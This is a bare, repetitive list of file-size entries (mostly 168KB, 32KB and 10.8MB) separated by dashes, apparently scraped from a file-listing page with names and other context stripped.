Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
756KB
-
Filesize
2.0MB
-
Filesize
72KB
-
Filesize
240KB
-
Filesize
1.8MB
-
Filesize
712KB
-
Filesize
320KB
-
Filesize
7.5MB
-
Filesize
3.6MB
-
Filesize
280KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
756KB
-
Filesize
4.3MB
-
Filesize
232KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
8KB